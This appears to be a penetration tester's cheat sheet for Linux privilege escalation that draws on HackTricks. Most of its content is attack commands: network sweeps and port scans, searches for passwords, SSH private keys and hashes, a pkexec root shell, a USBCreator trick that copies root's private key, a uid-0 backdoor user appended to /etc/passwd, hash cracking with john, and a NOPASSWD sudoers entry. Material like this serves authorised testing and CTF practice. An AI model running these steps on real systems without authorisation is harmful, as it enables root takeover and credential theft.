Linux Privilege Escalation

• Get your own local version of this checklist here:

Checklist - Linux Privilege EscalationHackTricks

By Carlos Palop

• Make sure you have pspy and linpeas ready:

PEASS-ng/linPEAS/README.md at master · peass-ng/PEASS-ngGitHub

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

Enumeration

Check sudo permissions

sudo -l

Check Hostname

hostname -I

Check the internal network

ifconfig

Check mounted devices

mount

Container processes

ps auxww | grep docker
ps auxww | grep lxd

Read crontab file

cat /etc/crontab

Check Services running

ls /etc/init.d

Check System info

uname -a

Check groups file

cat /etc/group

Show listening ports

netstat -tuln

Listen to the localhost

netstat -an -p tcp

Check binaries with capabilities

getcap -r / 2>/dev/null

SUID/SETGID binaries

find / -perm -4000 -or -perm -2000 2>/dev/null

Traces library function calls

ltrace ProgramName

Search Kernel for Exploits

searchsploit "Linux Kernel" | grep <version>

---

Scan the local network:

• Find one many hosts there are in the network by doing a ping sweep:

for i in {1..254}; do (ping -c 1 192.168.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

• If nc is installed can be use to scan for open ports:

nc -zv 192.168.0.1 1-65535 2>&1 | grep -v refused | tee scan

UDP scan

nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused

• Other wise get a nmap binary.

Grepping files:

• Search for the string pass (case-insensitive) in all files and directories recursively:

grep -iR "pass" * 2>/dev/null

• Search for the string password in files with double extension, recursively:

grep password .*.* -r 2>/dev/null

• Search for ssh keys recursively from the current directory you are in:

grep -iR -E "(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)" * 2>/dev/null

• Is also possible to look for hashes by using regex to look for the hash length:

MD5 hashes

grep -aPo '[a-fA-F0-9]{32}' /DESIRED/PATH

SHA-1

grep -aPo '[a-fA-F0-9]{40}' /DESIRED/PATH

SHA-256

grep -aPo '[a-fA-F0-9]{64}' /DESIRED/PATH

SHA-512

grep -aPo '[a-fA-F0-9]{128}' /DESIRED/PATH

---

Polkit

• Check the sudoers file:

cat /etc/sudoers

• Check polkit policy:

cat /etc/polkit-1/localauthority.conf.d

Become root

pkexec "/bin/sh"

USBCreator

• Allows to over write files with sudo permissions

Copy root private key

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

---

Important Files

/etc/passwd

• If is possible to write the file:

Generate the password hash

openssl passwd -1 tokyo

Add the line

echo 'tokyo:$1$iLayOiAd$8dHGiU.Qvk/uqjnoWzRpm/:0:0:tokyo:/root:/bin/bash' >> passwd

---

/etc/shadow

• Crack the hash with john

echo 'zoe:$y$j9T$Ct0y5TNQ/sv95CFPz510O/$7YtCDOBISfngZeQ3rsDkRcw2XTFDgHBkxDpuhyBLNO1:1002:1002:zoe:/home/zoe:/bin/bash' > shadowHash.txt

• Now crack it:

john --wordlist=~/Documents/Wordlists/rockyou.txt shadow.txt --format=crypt

---

/var/log

• adm group can read log files.

---

/etc/sudoers

• If the file is read-only, you need to change its permissions to allow write access:

chmod +w /etc/sudoers

• Add the following line:

yourUser   ALL=(ALL) NOPASSWD: ALL

• Restore the original file permissions to make it read-only again:

chmod 440 /mnt/etc/sudoers

---